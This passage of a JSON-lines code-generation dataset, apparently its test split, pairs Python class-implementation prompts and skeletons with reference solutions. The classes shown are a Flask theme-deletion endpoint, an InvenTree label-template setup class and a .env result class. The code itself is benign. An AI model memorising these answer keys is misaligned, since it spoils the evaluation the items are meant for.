nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/LC046_permutations.py", "source_repo": "jxie0755/Learning_Python", "split": "test", "star_events_count": 0} {"blob_id": "4f0573037474ae51a9f79fb5c4f1659eaea08c13", "bodies": ["self.reqparser = reqparse.RequestParser()\nself.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\nself.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])", "if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\nargs = self.reqparser.parse_args()\ntheme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\nif not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\nsub_themes = SubTheme.get_by_theme_id(theme.id)\nfor sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\ntheme.delete()\ntheme.commit()\nreturn ('', HTTPStatus.NO_CONTENT)"], "bodies_text": "<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "class_docstring": "Delete an existing Theme", "class_name": "DeleteTheme", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. 
:type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000464", "length_bytes": 1917, "license_type": "permissive", "methods": [{"docstring": "Set required arguments for POST request", "name": "__init__", "signature": "def __init__(self) -> None"}, {"docstring": "Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code", "name": "post", "signature": "def post(self) -> ({str: str}, HTTPStatus)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007354", "prompt": "Implement the Python class `DeleteTheme` described below.\n\nClass description:\nDelete an existing Theme\n\nMethod signatures and docstrings:\n- def __init__(self) -> None: Set required arguments for POST request\n- def post(self) -> ({str: str}, HTTPStatus): Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code", "prompted_full_text": "Implement the Python class `DeleteTheme` described below.\n\nClass description:\nDelete an existing Theme\n\nMethod signatures and docstrings:\n- def __init__(self) -> None: Set required arguments for POST request\n- def post(self) -> ({str: str}, HTTPStatus): Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\n\n<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. 
:type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n<|end_body_0|>\n\n<|body_start_1|>\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n<|end_body_1|>\n", "revision_id": "5d123691d1f25d0b85e20e4e8293266bf23c9f8a", "skeleton": "<|skeleton|>\nclass DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n <|body_0|>\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. :type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeleteTheme:\n \"\"\"Delete an existing Theme\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Set required arguments for POST request\"\"\"\n self.reqparser = reqparse.RequestParser()\n self.reqparser.add_argument('name', required=False, store_missing=False, type=str, location=['form', 'json'])\n self.reqparser.add_argument('id', required=False, store_missing=False, type=str, location=['form', 'json'])\n\n def post(self) -> ({str: str}, HTTPStatus):\n \"\"\"Delete an existing Theme. :param name: name of Theme to delete. :param id: id of Theme to delete. 
:type name: str :type id: str :returns: A no content with a http status code of 204, otherwise a JSON of the error details and the appropriate http status code\"\"\"\n if not get_jwt_claims()['admin']:\n return ({'error': 'administration privileges required'}, HTTPStatus.FORBIDDEN)\n args = self.reqparser.parse_args()\n theme = Theme.get_by_name(args['name']) if 'name' in args else Theme.get_by_id(args['id'])\n if not theme:\n return ({'error': 'Theme does not exists.', 'id': ' ', 'name': args['name']}, HTTPStatus.BAD_REQUEST)\n sub_themes = SubTheme.get_by_theme_id(theme.id)\n for sub_theme in sub_themes:\n sub_theme.delete()\n sub_theme.commit()\n theme.delete()\n theme.commit()\n return ('', HTTPStatus.NO_CONTENT)\n", "source": "the_stack_v2_python_sparse", "source_path": "Analytics/resources/themes/delete_theme.py", "source_repo": "thanosbnt/SharingCitiesDashboard", "split": "test", "star_events_count": 0} {"blob_id": "1d90ddcf924a46eee270c77349d7b9bdb184343b", "bodies": ["if not isPluginRegistryLoaded() or not isInMainThread():\n return\nif canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)", "import label.models\nassert bool(label.models.StockLocationLabel is not None)\nself.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\nself.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\nself.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\nself.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])", "src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\ndst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\nif not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\nfor label in labels:\n self.create_template_label(model, src_dir, ref_name, label)", "filename = os.path.join('label', 'inventree', ref_name, label['file'])\nsrc_file = src_dir.joinpath(label['file'])\ndst_file = settings.MEDIA_ROOT.joinpath(filename)\nto_copy = False\nif dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\nelse:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\nif to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\nif model.objects.filter(label=filename).exists():\n return\nlogger.info(f\"Creating entry for {model} '{label['name']}'\")\ntry:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', 
enabled=True, width=label['width'], height=label['height'])\nexcept Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")"], "bodies_text": "<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "class_docstring": "App configuration class for the 'label' app", "class_name": "LabelConfig", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n 
def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000465", "length_bytes": 6157, "license_type": "permissive", "methods": [{"docstring": "This function is called whenever the label app is loaded.", "name": "ready", "signature": "def ready(self)"}, {"docstring": "Create all default templates.", "name": "create_labels", "signature": "def create_labels(self)"}, 
{"docstring": "Create folder and database entries for the default templates, if they do not already exist.", "name": "create_labels_category", "signature": "def create_labels_category(self, model, ref_name, labels)"}, {"docstring": "Ensure a label template is in place.", "name": "create_template_label", "signature": "def create_template_label(self, model, src_dir, ref_name, label)"}], "n_methods": 4, "prompt": "Implement the Python class `LabelConfig` described below.\n\nClass description:\nApp configuration class for the 'label' app\n\nMethod signatures and docstrings:\n- def ready(self): This function is called whenever the label app is loaded.\n- def create_labels(self): Create all default templates.\n- def create_labels_category(self, model, ref_name, labels): Create folder and database entries for the default templates, if they do not already exist.\n- def create_template_label(self, model, src_dir, ref_name, label): Ensure a label template is in place.", "prompted_full_text": "Implement the Python class `LabelConfig` described below.\n\nClass description:\nApp configuration class for the 'label' app\n\nMethod signatures and docstrings:\n- def ready(self): This function is called whenever the label app is loaded.\n- def create_labels(self): Create all default templates.\n- def create_labels_category(self, model, ref_name, labels): Create folder and database entries for the default templates, if they do not already exist.\n- def create_template_label(self, model, src_dir, ref_name, label): Ensure a label template is in place.\n\n<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n<|end_body_0|>\n\n<|body_start_1|>\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 
'description': 'Example build line label', 'width': 125, 'height': 48}])\n<|end_body_1|>\n\n<|body_start_2|>\n src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n if not dst_dir.exists():\n logger.info(f\"Creating required directory: '{dst_dir}'\")\n dst_dir.mkdir(parents=True, exist_ok=True)\n for label in labels:\n self.create_template_label(model, src_dir, ref_name, label)\n<|end_body_2|>\n\n<|body_start_3|>\n filename = os.path.join('label', 'inventree', ref_name, label['file'])\n src_file = src_dir.joinpath(label['file'])\n dst_file = settings.MEDIA_ROOT.joinpath(filename)\n to_copy = False\n if dst_file.exists():\n if hashFile(dst_file) != hashFile(src_file):\n logger.info(f\"Hash differs for '{filename}'\")\n to_copy = True\n else:\n logger.info(f\"Label template '{filename}' is not present\")\n to_copy = True\n if to_copy:\n logger.info(f\"Copying label template '{dst_file}'\")\n dst_file.parent.mkdir(parents=True, exist_ok=True)\n shutil.copyfile(src_file, dst_file)\n if model.objects.filter(label=filename).exists():\n return\n logger.info(f\"Creating entry for {model} '{label['name']}'\")\n try:\n model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n except Exception:\n logger.warning(f\"Failed to create label '{label['name']}'\")\n<|end_body_3|>\n", "revision_id": "e88a8e99a5f0b201c67a95cba097c729f090d5e2", "skeleton": "<|skeleton|>\nclass LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n <|body_0|>\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n <|body_1|>\n\n def create_labels_category(self, model, ref_name, labels):\n \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n <|body_2|>\n\n def create_template_label(self, model, src_dir, ref_name, label):\n \"\"\"Ensure a label template is in place.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LabelConfig:\n \"\"\"App configuration class for the 'label' app\"\"\"\n\n def ready(self):\n \"\"\"This function is called whenever the label app is loaded.\"\"\"\n if not isPluginRegistryLoaded() or not isInMainThread():\n return\n if canAppAccessDatabase(allow_test=False):\n try:\n self.create_labels()\n except (AppRegistryNotReady, OperationalError):\n warnings.warn('Database was not ready for creating labels', stacklevel=2)\n\n def create_labels(self):\n \"\"\"Create all default templates.\"\"\"\n import label.models\n assert bool(label.models.StockLocationLabel is not None)\n self.create_labels_category(label.models.StockItemLabel, 'stockitem', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}])\n self.create_labels_category(label.models.StockLocationLabel, 'stocklocation', [{'file': 'qr.html', 'name': 'QR Code', 'description': 'Simple QR code label', 'width': 24, 'height': 24}, {'file': 'qr_and_text.html', 'name': 'QR and text', 'description': 'Label with QR code and name of location', 'width': 50, 'height': 24}])\n self.create_labels_category(label.models.PartLabel, 'part', [{'file': 'part_label.html', 'name': 'Part Label', 'description': 'Simple part label', 
'description': 'Simple part label', 'width': 70, 'height': 24}, {'file': 'part_label_code128.html', 'name': 'Barcode Part Label', 'description': 'Simple part label with Code128 barcode', 'width': 70, 'height': 24}])\n        self.create_labels_category(label.models.BuildLineLabel, 'buildline', [{'file': 'buildline_label.html', 'name': 'Build Line Label', 'description': 'Example build line label', 'width': 125, 'height': 48}])\n\n    def create_labels_category(self, model, ref_name, labels):\n        \"\"\"Create folder and database entries for the default templates, if they do not already exist.\"\"\"\n        src_dir = Path(__file__).parent.joinpath('templates', 'label', ref_name)\n        dst_dir = settings.MEDIA_ROOT.joinpath('label', 'inventree', ref_name)\n        if not dst_dir.exists():\n            logger.info(f\"Creating required directory: '{dst_dir}'\")\n            dst_dir.mkdir(parents=True, exist_ok=True)\n        for label in labels:\n            self.create_template_label(model, src_dir, ref_name, label)\n\n    def create_template_label(self, model, src_dir, ref_name, label):\n        \"\"\"Ensure a label template is in place.\"\"\"\n        filename = os.path.join('label', 'inventree', ref_name, label['file'])\n        src_file = src_dir.joinpath(label['file'])\n        dst_file = settings.MEDIA_ROOT.joinpath(filename)\n        to_copy = False\n        if dst_file.exists():\n            if hashFile(dst_file) != hashFile(src_file):\n                logger.info(f\"Hash differs for '{filename}'\")\n                to_copy = True\n        else:\n            logger.info(f\"Label template '{filename}' is not present\")\n            to_copy = True\n        if to_copy:\n            logger.info(f\"Copying label template '{dst_file}'\")\n            dst_file.parent.mkdir(parents=True, exist_ok=True)\n            shutil.copyfile(src_file, dst_file)\n        if model.objects.filter(label=filename).exists():\n            return\n        logger.info(f\"Creating entry for {model} '{label['name']}'\")\n        try:\n            model.objects.create(name=label['name'], description=label['description'], label=filename, filters='', enabled=True, width=label['width'], height=label['height'])\n        except Exception:\n            logger.warning(f\"Failed to create label '{label['name']}'\")\n", "source": "the_stack_v2_python_sparse", "source_path": "InvenTree/label/apps.py", "source_repo": "inventree/InvenTree", "split": "test", "star_events_count": 3077} {"blob_id": "a396e0d0d0832825a16cf6cf5995af63faa77d9a", "bodies": ["self = object.__new__(cls)\nself.variables = variables\nself.parser_failure_info = parser_failure_info\n
self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "class_docstring": "Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.", "class_name": "DotEnvResult", "detected_licenses": ["LicenseRef-scancode-warranty-disclaimer"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. 
Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000466", "length_bytes": 5881, "license_type": "permissive", "methods": [{"docstring": "Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.", "name": "__new__", "signature": "def __new__(cls, variables, parser_failure_info, file_path)"}, {"docstring": "Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`", "name": "insert_to_environmental_variables", "signature": "def insert_to_environmental_variables(self)"}, {"docstring": "Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError", "name": "raise_if_failed", "signature": "def raise_if_failed(self)"}, {"docstring": "Returns the dot env result's representation.", "name": "__repr__", "signature": "def __repr__(self)"}], "n_methods": 4, "prompt": "Implement the Python class `DotEnvResult` described below.\n\nClass description:\nRepresents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\n\nMethod signatures and docstrings:\n- def __new__(cls, variables, parser_failure_info, file_path): Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\n- def 